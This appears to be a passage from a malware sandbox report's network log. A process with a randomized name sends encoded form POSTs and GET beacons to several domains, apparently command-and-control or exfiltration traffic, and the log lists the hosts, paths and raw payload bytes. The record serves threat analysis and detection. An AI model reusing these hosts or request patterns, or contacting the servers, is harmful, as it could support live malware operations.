                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.study-in-nyc.online
                                                        Origin: http://www.study-in-nyc.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.study-in-nyc.online/f1gw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6b 5a 54 50 44 34 57 73 34 78 37 5a 69 42 75 64 7a 59 53 65 49 44 6d 50 4a 67 51 79 4b 51 31 67 50 71 76 66 6b 59 73 44 38 2f 4c 2b 44 34 62 48 57 4a 44 6d 37 70 4c 35 38 36 52 45 65 2b 44 58 50 37 6f 44 39 2b 59 2b 67 68 52 58 4e 48 68 30 69 38 77 38 67 30 75 58 51 47 35 48 48 44 57 70 55 61 76 41 68 43 2b 70 6d 63 35 75 62 52 64 51 62 36 6a 4b 6a 52 55 4a 77 58 76 6d 4b 36 55 70 69 4f 2b 6d 6a 55 59 69 31 64 58 61 48 2b 47 79 73 52 39 4c 31 73 2f 61 47 54 41 32 35 6a 2b 71 76 71 4a 4f 6a 6a 71 2b 4f 74 41 78 39 79 55 70 50 47 49 48 5a 50 59 4c 46 52 2b 33 75 4d 50 6b 4c 51 35 70 50 6f 63 3d
                                                        Data Ascii: x0wHoJ8X=kZTPD4Ws4x7ZiBudzYSeIDmPJgQyKQ1gPqvfkYsD8/L+D4bHWJDm7pL586REe+DXP7oD9+Y+ghRXNHh0i8w8g0uXQG5HHDWpUavAhC+pmc5ubRdQb6jKjRUJwXvmK6UpiO+mjUYi1dXaH+GysR9L1s/aGTA25j+qvqJOjjq+OtAx9yUpPGIHZPYLFR+3uMPkLQ5pPoc=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.55366413.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:10.467174053 CEST857OUTPOST /f1gw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.study-in-nyc.online
                                                        Origin: http://www.study-in-nyc.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.study-in-nyc.online/f1gw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6b 5a 54 50 44 34 57 73 34 78 37 5a 6a 67 65 64 78 2f 47 65 64 54 6d 41 58 77 51 79 63 67 31 6b 50 71 7a 66 6b 61 41 54 2f 4a 37 2b 43 61 54 48 56 4c 6e 6d 6f 5a 4c 35 7a 61 52 4c 61 2b 44 71 50 37 6b 74 39 2f 6b 2b 67 68 56 58 4e 46 70 30 6a 4d 4d 2f 6d 30 75 56 61 57 35 42 61 7a 57 70 55 61 76 41 68 47 58 4f 6d 63 78 75 61 68 4e 51 62 65 33 46 67 52 55 4f 6d 48 76 6d 4f 36 55 6c 69 4f 2f 7a 6a 56 31 2f 31 66 66 61 48 2f 32 79 72 46 70 55 76 38 2f 63 4d 7a 42 79 39 7a 76 79 32 4c 59 48 70 52 44 32 66 74 51 73 31 6b 35 44 56 6b 41 76 4b 76 30 7a 56 43 32 41 2f 38 75 4e 52 7a 70 5a 52 2f 4c 32 52 72 42 32 6a 50 78 55 47 48 6f 42 6e 4d 36 6f 2b 47 38 2b
                                                        Data Ascii: x0wHoJ8X=kZTPD4Ws4x7Zjgedx/GedTmAXwQycg1kPqzfkaAT/J7+CaTHVLnmoZL5zaRLa+DqP7kt9/k+ghVXNFp0jMM/m0uVaW5BazWpUavAhGXOmcxuahNQbe3FgRUOmHvmO6UliO/zjV1/1ffaH/2yrFpUv8/cMzBy9zvy2LYHpRD2ftQs1k5DVkAvKv0zVC2A/8uNRzpZR/L2RrB2jPxUGHoBnM6o+G8+


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.55366513.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:13.009901047 CEST1874OUTPOST /f1gw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.study-in-nyc.online
                                                        Origin: http://www.study-in-nyc.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.study-in-nyc.online/f1gw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6b 5a 54 50 44 34 57 73 34 78 37 5a 6a 67 65 64 78 2f 47 65 64 54 6d 41 58 77 51 79 63 67 31 6b 50 71 7a 66 6b 61 41 54 2f 4b 62 2b 44 76 66 48 58 71 6e 6d 72 5a 4c 35 36 36 52 62 61 2b 44 37 50 37 73 70 39 2f 6f 75 67 6a 64 58 4d 67 39 30 7a 75 6f 2f 31 55 75 56 55 47 35 41 48 44 58 30 55 61 2f 45 68 43 37 4f 6d 63 78 75 61 6a 6c 51 50 61 6a 46 6d 52 55 4a 77 58 76 55 4b 36 55 4a 69 4f 33 6a 6a 56 78 76 67 2b 2f 61 48 66 6d 79 74 7a 56 55 6b 38 2f 65 4c 7a 42 55 39 7a 6a 54 32 4c 46 38 70 52 62 63 66 76 77 73 2f 69 30 69 53 55 63 30 5a 4a 30 66 57 77 69 74 72 70 69 2f 55 79 56 4c 63 59 6a 32 4f 4a 41 5a 31 76 63 52 48 31 73 4d 7a 49 50 34 77 51 6f 79 53 39 76 56 4e 70 52 37 4f 32 4f 4e 72 4f 63 4a 5a 31 6c 6c 48 77 2b 44 39 53 38 46 79 68 43 34 38 46 7a 73 45 31 7a 2b 6a 57 69 79 6c 4f 30 59 70 6a 59 4f 52 30 63 67 71 43 4d 72 79 37 4c 51 56 31 48 73 71 64 45 35 55 6d 54 4f 4a 78 53 69 49 52 6c 57 6a 4e 34 4c 69 6d 61 2f 2f 2f 64 33 4f 32 46 2b 2f 66 49 39 7a 67 39 69 2f [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=kZTPD4Ws4x7Zjgedx/GedTmAXwQycg1kPqzfkaAT/Kb+DvfHXqnmrZL566Rba+D7P7sp9/ougjdXMg90zuo/1UuVUG5AHDX0Ua/EhC7OmcxuajlQPajFmRUJwXvUK6UJiO3jjVxvg+/aHfmytzVUk8/eLzBU9zjT2LF8pRbcfvws/i0iSUc0ZJ0fWwitrpi/UyVLcYj2OJAZ1vcRH1sMzIP4wQoyS9vVNpR7O2ONrOcJZ1llHw+D9S8FyhC48FzsE1z+jWiylO0YpjYOR0cgqCMry7LQV1HsqdE5UmTOJxSiIRlWjN4Lima///d3O2F+/fI9zg9i/igmZHTcmxlTKkG/+3l1SYm4WFj3QkggY1vKinc/CrIcnSQchZQk35xbf9f9H/9x+dpUNmsHXUYap2IiVxAfBc/rI3wy5zjXtzH3ZJBE6hTbH5IZsCJc4KI0eTzazTJBhqrK21MBwIV0Vvt2YPew/JWSuVL/JRvBB13NXELPlPpfu+xGwvkeBFaaEmBxygfXM58BtfMaU7GseggTuBuhagWg+C9CNVURs3FTIyc/4r9XtCjfOQUyqDPDSqDvhgjlMXLkjLHutK8tW6IZeOqk55dbsYycdFimzV6tdk6p1Pqh4RriH3N1az2W9DFrn+K/luorwq8oHZEcJoeONu4o8BqbBPP2PfLyiLrK4aw8KAyA6cA06xp1Z6DnOB7MW7x0wK63yWogyQ7rBDDDPHt4CaUOlMG90KMRRfqe2rmUkQeu2xPztaFJUlGroAwIgy53JzLlD7JjUdKseLZN1uZjodzdUdMnV7+FYeGlJtfbVXGbohDpKBnl5rj3mjMkTNl2AIeCjSXVRRryvdPwxk5ULPgy9RSP++0lEeE5eNFlXfDzhYtMXNsv1QyMjIgJXRznJRf0LGSX5GAE+su5qoepVz2e3Zrak45BBBkZksC/1VT0N+vy/3a46vFbryCdAwDCO2W3Z43nxEESOqrQJPGrZPrE21Vr/XYcQdb [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.55366613.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:15.637356043 CEST568OUTGET /f1gw/?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.study-in-nyc.online
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:21:16.091551065 CEST410INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Wed, 18 Sep 2024 14:21:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 270
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 30 77 48 6f 4a 38 58 3d 70 62 37 76 41 4d 47 79 67 43 7a 67 69 6c 36 4b 69 61 6d 66 4f 79 33 56 58 7a 41 33 58 69 39 73 4c 5a 76 30 79 71 45 36 33 34 71 55 61 4c 48 4d 52 4b 61 6e 2f 75 2b 46 31 5a 59 2b 54 74 2f 6f 43 37 55 64 6c 76 6f 54 2f 52 52 38 4c 77 68 62 68 64 45 63 30 31 69 4f 56 6b 42 78 43 69 72 73 45 61 76 32 79 7a 4c 64 69 38 35 62 66 69 34 58 54 70 58 42 67 56 49 41 73 6b 2b 30 49 71 5a 7a 2f 77 3d 3d 26 32 56 44 6c 4a 3d 5a 32 56 64 68 54 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTx"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.553667148.72.152.17480
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:37.710448980 CEST825OUTPOST /2jit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elsupertodo.net
                                                        Origin: http://www.elsupertodo.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.elsupertodo.net/2jit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 51 51 76 37 59 39 62 39 64 67 54 43 79 37 50 48 4b 39 57 4a 31 46 4b 49 6a 6c 6a 4f 71 47 77 42 6b 77 77 6c 50 75 37 6b 55 6e 74 49 37 71 73 65 48 71 56 6c 74 57 62 2f 66 49 72 7a 33 7a 54 6d 6f 53 75 4b 31 4a 75 6f 66 45 67 75 6d 4c 6f 2f 46 77 71 55 4c 38 4a 62 43 53 62 45 71 6f 30 41 35 7a 4d 6e 33 61 4e 64 61 62 53 65 67 42 6f 38 47 6d 4f 56 57 64 65 61 4e 2f 55 71 67 67 47 6a 76 57 46 50 6b 2f 2b 6e 7a 68 44 75 66 6a 68 46 41 51 37 33 4b 5a 70 4d 41 4e 45 4f 33 55 4d 46 65 2b 64 38 62 76 30 76 7a 67 71 52 6f 42 63 76 57 61 46 70 62 48 44 69 75 64 74 58 34 50 33 4a 70 6d 32 38 49 51 3d
                                                        Data Ascii: x0wHoJ8X=vQQv7Y9b9dgTCy7PHK9WJ1FKIjljOqGwBkwwlPu7kUntI7qseHqVltWb/fIrz3zTmoSuK1JuofEgumLo/FwqUL8JbCSbEqo0A5zMn3aNdabSegBo8GmOVWdeaN/UqggGjvWFPk/+nzhDufjhFAQ73KZpMANEO3UMFe+d8bv0vzgqRoBcvWaFpbHDiudtX4P3Jpm28IQ=
                                                        Sep 18, 2024 16:21:38.233175039 CEST391INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:21:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.elsupertodo.net/2jit/
                                                        X-XSS-Protection: 1; mode=block
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.553668148.72.152.17480
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:40.260744095 CEST845OUTPOST /2jit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elsupertodo.net
                                                        Origin: http://www.elsupertodo.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.elsupertodo.net/2jit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 51 51 76 37 59 39 62 39 64 67 54 45 53 72 50 55 64 4a 57 4f 56 46 4c 48 44 6c 6a 41 4b 47 73 42 6b 4d 77 6c 4f 71 72 6a 6d 44 74 49 5a 69 73 66 47 71 56 6f 4e 57 62 72 50 49 75 2b 58 7a 49 6d 6f 66 64 4b 30 31 75 6f 66 51 67 75 6b 44 6f 2b 30 77 72 53 62 38 4c 52 53 53 64 48 61 6f 30 41 35 7a 4d 6e 33 2b 7a 64 65 33 53 65 51 78 6f 37 58 6d 42 66 32 64 64 54 74 2f 55 38 51 67 4b 6a 76 58 51 50 6d 61 70 6e 32 74 44 75 66 7a 68 46 53 34 36 39 4b 5a 76 43 67 4d 52 47 6d 70 33 43 49 71 53 2f 71 36 6d 78 53 73 52 51 65 73 32 31 30 53 74 36 37 72 37 79 39 56 61 47 49 75 65 54 4b 32 47 69 66 48 63 7a 66 69 52 6b 4e 72 42 62 39 56 74 7a 4b 34 32 69 66 70 39
                                                        Data Ascii: x0wHoJ8X=vQQv7Y9b9dgTESrPUdJWOVFLHDljAKGsBkMwlOqrjmDtIZisfGqVoNWbrPIu+XzImofdK01uofQgukDo+0wrSb8LRSSdHao0A5zMn3+zde3SeQxo7XmBf2ddTt/U8QgKjvXQPmapn2tDufzhFS469KZvCgMRGmp3CIqS/q6mxSsRQes210St67r7y9VaGIueTK2GifHczfiRkNrBb9VtzK42ifp9
                                                        Sep 18, 2024 16:21:40.764022112 CEST391INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:21:40 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.elsupertodo.net/2jit/
                                                        X-XSS-Protection: 1; mode=block
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.553669148.72.152.17480
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:42.810950041 CEST1862OUTPOST /2jit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elsupertodo.net
                                                        Origin: http://www.elsupertodo.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.elsupertodo.net/2jit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 51 51 76 37 59 39 62 39 64 67 54 45 53 72 50 55 64 4a 57 4f 56 46 4c 48 44 6c 6a 41 4b 47 73 42 6b 4d 77 6c 4f 71 72 6a 6d 4c 74 4a 71 36 73 66 6c 43 56 70 4e 57 62 30 2f 49 76 2b 58 79 59 6d 6f 48 52 4b 30 35 59 6f 63 6f 67 76 42 58 6f 71 57 59 72 62 62 38 4c 66 43 53 63 45 71 70 2b 41 39 65 4c 6e 33 75 7a 64 65 33 53 65 54 70 6f 74 57 6d 42 5a 32 64 65 61 4e 2f 75 71 67 68 6a 6a 73 6e 41 50 6d 65 35 6e 69 52 44 75 2f 44 68 4a 48 4d 36 6e 4b 5a 74 46 67 4e 53 47 6d 6c 6f 43 4d 4b 6f 2f 72 2f 7a 78 56 67 52 52 59 68 4c 78 6b 43 39 6d 49 37 36 2b 39 74 67 62 6f 36 42 4e 34 76 32 70 2b 2f 67 35 4c 79 34 6e 72 72 48 57 65 55 57 70 4e 77 39 6e 4c 38 51 64 45 4e 74 6e 46 4c 42 76 72 74 7a 6a 50 50 48 39 33 30 6c 32 37 32 67 56 64 68 68 36 73 6e 79 35 45 74 58 7a 2b 6b 73 4a 36 47 41 78 55 35 36 34 42 72 32 55 57 2b 78 54 59 43 38 2f 74 77 70 47 30 2f 55 4d 77 76 2f 6d 2b 4e 56 53 54 53 71 5a 49 44 2b 6f 59 55 63 6e 5a 32 79 58 41 5a 43 67 2f 75 6a 4e 52 4d 75 65 6c 70 64 35 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=vQQv7Y9b9dgTESrPUdJWOVFLHDljAKGsBkMwlOqrjmLtJq6sflCVpNWb0/Iv+XyYmoHRK05YocogvBXoqWYrbb8LfCScEqp+A9eLn3uzde3SeTpotWmBZ2deaN/uqghjjsnAPme5niRDu/DhJHM6nKZtFgNSGmloCMKo/r/zxVgRRYhLxkC9mI76+9tgbo6BN4v2p+/g5Ly4nrrHWeUWpNw9nL8QdENtnFLBvrtzjPPH930l272gVdhh6sny5EtXz+ksJ6GAxU564Br2UW+xTYC8/twpG0/UMwv/m+NVSTSqZID+oYUcnZ2yXAZCg/ujNRMuelpd5RrHZKyAueUqQgzuH6DiIsYCkrm5QH6iLKzKoC3AXvdP1DCtuObIqP8eHIVPg6TFEREm84MiHf0ApGWFrr8x/zy87Zx4DlCfeAeeAnGSnaKZENZOOQ25TJh2m2DeU+ryLPICkvZn6Ptvg0k7cOC4OC2SGr6HAcEEHdXX9V9Uwe2LUazXRi//TpjN9Hhda87sbqJ6vSHPvt2/pv3g+XZ+eJBUV2aAwdWTOVizxcUWLHea+U0Q5uyLxrfVImf44Xz1o/XSj19arBr4yn6p9rayrHBt3gxHeC6EUzGKvfGrev38zroNX2OjDXaKlXg1ufqpS0jXdOtATnNo3V6muvcq9OvBxhbNLkbdWbVF4jOi7kB0I8nSjgOOTnI7tkDZ8SDI4YthXOtuCLOBOXiT/1bHWX3XNdaDm5E+RYuPCzQ3gDGlxvrIcuont8cqwYND94ArNQUqD1B7yWWXcJWD29LrnV6oD0k9RF+9zFlyE8bGbErvMy/pKRQhcrGDNUITeJypr1jogLzyyQYiXoAe7vhGfgAm5kNe/fDWS41OrATmS1YR0IuVXesCYRh8786Qye9mzDGZ4hIzaVnf2g40REthwes1bvaAGur7+svAnsGsTBD/5zW69Y2Yq+ZNrNYnWgEdaGpmjTgV1rZJRC8tPtXnAYawQHx+Irfu3MU [TRUNCATED]
                                                        Sep 18, 2024 16:21:43.321335077 CEST391INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:21:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.elsupertodo.net/2jit/
                                                        X-XSS-Protection: 1; mode=block
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.553670148.72.152.17480
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:45.351696014 CEST564OUTGET /2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elsupertodo.net
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:21:45.847976923 CEST547INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:21:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx
                                                        X-XSS-Protection: 1; mode=block
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.5536713.33.130.19080
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:50.886434078 CEST813OUTPOST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
